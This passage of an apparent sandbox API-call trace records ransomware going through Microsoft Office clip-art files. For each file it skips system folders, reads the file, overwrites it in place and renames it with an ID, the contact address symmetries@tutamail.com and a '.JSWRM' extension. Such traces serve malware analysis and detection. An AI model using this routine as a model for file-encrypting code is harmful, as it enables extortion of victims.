hHeap=0x1e0000) returned 1 [0098.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0098.628] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00241_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00241_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.628] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3980) returned 1 [0098.629] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf80) returned 0x23fc98 [0098.629] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xf80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xf80, lpOverlapped=0x0) returned 1 [0098.630] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.630] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xf80, lpOverlapped=0x0) returned 1 [0098.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0098.630] CloseHandle (hObject=0x314) returned 1 [0098.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0098.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0098.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0098.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0098.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0098.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0098.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0098.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0098.631] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00241_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00241_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00241_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00241_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0098.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0098.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0098.632] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf74, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TN00246_.WMF", cAlternateFileName="")) returned 1 [0098.632] lstrcmpiW (lpString1="TN00246_.WMF", lpString2=".") returned 1 [0098.632] lstrcmpiW (lpString1="TN00246_.WMF", lpString2="..") returned 1 [0098.632] lstrcmpiW (lpString1="TN00246_.WMF", lpString2="...") returned 1 [0098.632] lstrcmpiW (lpString1="TN00246_.WMF", lpString2="windows") returned -1 [0098.632] lstrcmpiW (lpString1="TN00246_.WMF", lpString2="recovery") returned 1 [0098.632] lstrcmpiW (lpString1="TN00246_.WMF", lpString2="perflogs") returned 1 [0098.632] lstrcmpiW (lpString1="TN00246_.WMF", lpString2="documents and settings") returned 1 [0098.632] lstrcmpiW (lpString1="TN00246_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.632] lstrcmpiW (lpString1="TN00246_.WMF", lpString2="system volume information") returned 1 [0098.632] lstrcmpiW (lpString1="TN00246_.WMF", lpString2="msocache") returned 1 [0098.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0098.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00246_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00246_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00246_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0098.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0098.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00246_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00246_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00246_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0098.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0098.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0098.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0098.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00246_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00246_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.634] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3956) returned 1 [0098.634] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf70) returned 0x23fc98 [0098.634] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xf70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xf70, lpOverlapped=0x0) returned 1 [0098.675] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.675] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xf70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xf70, lpOverlapped=0x0) returned 1 [0098.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0098.676] CloseHandle (hObject=0x314) returned 1 [0098.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0098.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0098.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0098.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0098.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0098.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0098.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.676] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00246_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00246_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00246_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00246_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0098.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0098.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0098.678] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15bc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TN00253_.WMF", cAlternateFileName="")) returned 1 [0098.678] lstrcmpiW (lpString1="TN00253_.WMF", lpString2=".") returned 1 [0098.678] lstrcmpiW (lpString1="TN00253_.WMF", lpString2="..") returned 1 [0098.678] lstrcmpiW (lpString1="TN00253_.WMF", lpString2="...") returned 1 [0098.678] lstrcmpiW (lpString1="TN00253_.WMF", lpString2="windows") returned -1 [0098.678] lstrcmpiW (lpString1="TN00253_.WMF", lpString2="recovery") returned 1 [0098.678] lstrcmpiW (lpString1="TN00253_.WMF", lpString2="perflogs") returned 1 [0098.678] lstrcmpiW (lpString1="TN00253_.WMF", lpString2="documents and settings") returned 1 [0098.678] lstrcmpiW (lpString1="TN00253_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.678] lstrcmpiW (lpString1="TN00253_.WMF", lpString2="system volume information") returned 1 [0098.678] lstrcmpiW (lpString1="TN00253_.WMF", lpString2="msocache") returned 1 [0098.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0098.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00253_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00253_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00253_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0098.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0098.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00253_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00253_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00253_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0098.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0098.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0098.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0098.678] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00253_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00253_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.679] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5564) returned 1 [0098.679] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x15b0) returned 0x205850 [0098.679] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x15b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x15b0, lpOverlapped=0x0) returned 1 [0098.681] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.681] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x15b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x15b0, lpOverlapped=0x0) returned 1 [0098.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0098.681] CloseHandle (hObject=0x314) returned 1 [0098.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0098.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0098.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0098.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0098.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0098.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0098.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.682] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00253_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00253_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00253_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00253_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0098.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0098.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0098.683] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1da8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TN00255_.WMF", cAlternateFileName="")) returned 1 [0098.683] lstrcmpiW (lpString1="TN00255_.WMF", lpString2=".") returned 1 [0098.683] lstrcmpiW (lpString1="TN00255_.WMF", lpString2="..") returned 1 [0098.683] lstrcmpiW (lpString1="TN00255_.WMF", lpString2="...") returned 1 [0098.683] lstrcmpiW (lpString1="TN00255_.WMF", lpString2="windows") returned -1 [0098.683] lstrcmpiW (lpString1="TN00255_.WMF", lpString2="recovery") returned 1 [0098.683] lstrcmpiW (lpString1="TN00255_.WMF", lpString2="perflogs") returned 1 [0098.683] lstrcmpiW (lpString1="TN00255_.WMF", lpString2="documents and settings") returned 1 [0098.683] lstrcmpiW (lpString1="TN00255_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.683] lstrcmpiW (lpString1="TN00255_.WMF", lpString2="system volume information") returned 1 [0098.683] lstrcmpiW (lpString1="TN00255_.WMF", lpString2="msocache") returned 1 [0098.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0098.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00255_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00255_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00255_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0098.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0098.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00255_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00255_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00255_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0098.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0098.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0098.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0098.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00255_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00255_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.684] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7592) returned 1 [0098.684] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1da0) returned 0x205850 [0098.684] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1da0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1da0, lpOverlapped=0x0) returned 1 [0098.686] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.686] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1da0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1da0, lpOverlapped=0x0) returned 1 [0098.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 